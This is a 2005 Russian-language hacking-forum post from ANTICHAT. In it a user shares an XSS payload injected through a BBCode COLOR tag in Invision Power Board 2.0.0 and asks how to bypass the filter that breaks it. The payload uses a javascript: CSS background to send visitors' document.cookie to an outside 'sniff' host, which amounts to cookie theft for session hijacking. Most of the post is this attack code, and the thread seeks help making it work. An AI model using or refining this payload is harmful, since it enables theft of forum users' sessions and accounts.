HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Это фильтр или что? (проблема со вставкой скрипта в Ipb 2.0.0)
  #1  
Старый 26.04.2005, 17:40
Telepuz
Новичок
Регистрация: 30.03.2005
Сообщений: 19
С нами: 11113534

Репутация: 0
По умолчанию Это фильтр или что? (проблема со вставкой скрипта в Ipb 2.0.0)

Код:
<div class="postcolor" style='padding:4px;'><span style='color:<img src='http://aaaaa/=`aaajpg' border='0' alt='user posted image' />'>` style=background:url(javascript:document.images[68].src=&quot;http://*******/sniff.jpg?&quot;+document.cookie); </span></div>
Это получается поле вставки скрипта

Код:
[COLOR=]` style=background:url(javascript:document.images[68].src="http://*******/sniff.pg?"+document.cookie); [/COLOR]
перед style появляется />'

Как можно это обойти?
 
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проблема со сплоитом для ipb 2.0.0 Lord Nikon Уязвимости CMS / форумов 4 22.11.2005 15:51
Invision Power Board 2.0.0 - проблема со вставкой скрипта. Telepuz Уязвимости CMS / форумов 3 05.04.2005 13:49
помогите со вставкой скрипта kviv С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5 29.03.2005 07:51



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.